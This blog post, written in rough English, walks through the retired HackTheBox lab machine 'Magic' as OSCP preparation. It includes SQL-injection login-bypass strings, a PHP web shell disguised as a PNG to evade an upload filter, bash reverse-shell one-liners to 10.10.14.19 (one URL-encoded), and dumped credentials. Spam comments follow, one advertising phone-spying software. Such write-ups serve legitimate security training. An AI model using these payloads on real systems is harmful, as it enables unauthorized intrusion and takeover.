OSCP PREPROTİONS – HTB Magic

Magic machine is a vulnerable machine with Linux operating system among retired machines. We are expected to obtain user and root flags by using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan

Ful port scan

As a result of port scanning, 22/tcp ssh OpenSSH 7.6p1 and 80/tcp http Apache ports are open.
Let’s provide enumeration over port 80

Here we provided enumueraion on the web, we looked at the wpanalayzer and examined the source codes, but the only notable thing here was that there was a login page
We started a gobuster scan to detect hidden files and directories to see what might be lurking.
Gobuster scan

We did not get any results in the Gobuster scan.
Let’s go to login.php page here

Here comes the login screen, we looked at the source code etc. We did not see any interesting information. This is the input field where we enter the default credential information. We have not logged in, we first try sql injection attack to break this place
admin’or 1=1;– – –

admin’or’1=1;#
1’or’1’=1′))
admin’#
admin’– – –

We were able to make a successful entry here.

We encountered the upload page
Let’s test the file upload area here, a place that works in php code
We tried to create and upload any file with Touch

As far as we understand here file accepts jpg, jpeg png file lengths, let’s see how to bypass it
First, let’s add an additional esxtension to the file
I agreed to add png at the end

Let’s try here by adding the png at the end
filetest.php.png accepted when I uploaded the soy as filetest.php.png Let’s add a php shell screen by adding a comment to a png file here.

Then we wrote oho in front of the png extension to read this png file as php and uploaded it

Let’s go to the area where we uploaded the file

Here we added ? cmd=id to the url part and it gave us the id value

I’m trying to get him to give us a revershell
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4747 0>&1’
We use the command but it didn’t work because it was empty etc. so we encoded the url
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
and we got it and we made a request
this is how we got Shell

In this shell we see that our authorization is limited, we provide local enumueration

We did not find any interesting information on Linpeas.sh. Here we continue with manual local emueration.

Here we have obtained the credetial information from the db.php5 file.
theseus:iamkingtheseus
We tried to change the user using this credental information and could not log in because it was incorrect.

Here we understand that mysql is running inside, let’s look at the network connections running inside to make sure of this

We made sure we saw port 3306
Here when trying to connect to myqsl it was saying that there was no mysql

Here we typed mysql and pressed tab twice to see the installed mysql

Here we were able to get the dubp of the db after a little work with the show and dump options.

Here we have obtained credential information
theseus:Th3s3usW4sK1ng
Let’s change authorization using the password

We have successfully obtained the user flag, but we still do not have root privileges.
So let’s continue with local enumeration

The /bin/sysinfo file gives information about the system
Here in the MEM Usage section, the free command is running, we will manipulate this free command to run bash, let’s try to get root authorization in this way

We couldn’t get the printout here

I think the commands are getting confused so I’ll ask him to give me a revershell here
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I type the command

This is how we got root privileges

Comments

  1. sklep online

    Howdy! This is my first visit to your blog!

    We are a collection of volunteers and starting a new project
    in a community in the same niche. Your blog provided us valuable information to work on. You have
    done a outstanding job! I saw similar here: Sklep internetowy

  2. ecommerce

    Hello! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Kudos! You can read similar art here: Ecommerce

  3. sklep

    Hey there! Do you know if they make any plugins to assist with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good
    results. If you know of any please share. Many thanks!
    You can read similar text here: Najlepszy sklep

  4. Szpiegowskie Telefonu

    Kompatybilność mobilnego oprogramowania śledzącego jest bardzo dobra i jest kompatybilna z prawie wszystkimi urządzeniami z Androidem i iOS. Po zainstalowaniu oprogramowania śledzącego w telefonie docelowym można przeglądać historię połączeń, wiadomości z rozmów, zdjęcia, filmy, śledzić lokalizację GPS urządzenia, włączać mikrofon telefonu i rejestrować lokalizację w pobliżu.

  5. Lillie

    Hi there! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my website
    to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Many thanks! I saw similar blog here:
    Scrapebox List

  6. Link Building

    Hey there! Do you know if they make any plugins to help
    with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing
    very good success. If you know of any please share.
    Thanks! You can read similar article here: Scrapebox AA List

  7. tlovertonet

    Heya! I just wanted to ask if you ever have any issues with hackers? My last blog (wordpress) was hacked and I ended up losing several weeks of hard work due to no backup. Do you have any methods to protect against hackers?

  8. Lottery defeater

    Heya are using WordPress for your blog platform? I’m new to the blog world but I’m trying to get started and create my own. Do you require any coding knowledge to make your own blog? Any help would be really appreciated!

  9. phenq reviews

    Hello there I am so delighted I found your web site, I
    really found you by mistake, while I was researching on Aol
    for something else, Nonetheless I am here now and would just
    like to say many thanks for a fantastic post and a all round enjoyable blog (I also love the theme/design),
    I don’t have time to read through it all at the minute
    but I have bookmarked it and also added your RSS feeds, so when I have time I will
    be back to read a great deal more, Please do keep up the great job.

  10. cbd store

    I’d have to examine with you here. Which is not one thing I usually do! I take pleasure in reading a post that may make folks think. Additionally, thanks for permitting me to comment!

  11. xxx sites

    Hi! I know this is kinda off topic nevertheless I’d figured I’d ask.

    Would you be interested in exchanging links or maybe guest authoring a
    blog post or vice-versa? My blog addresses a lot of the same topics as
    yours and I believe we could greatly benefit from each other.
    If you are interested feel free to send me an e-mail.
    I look forward to hearing from you! Wonderful blog by the way!

  12. the genius wave

    Hello There. I found your weblog the usage of msn. That is an extremely well written article.

    I’ll make sure to bookmark it and return to read more of
    your useful info. Thanks for the post. I will definitely
    return.

  13. Pingback: 20 Myths About Private Psychiatrist: Busted – J&Sons

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir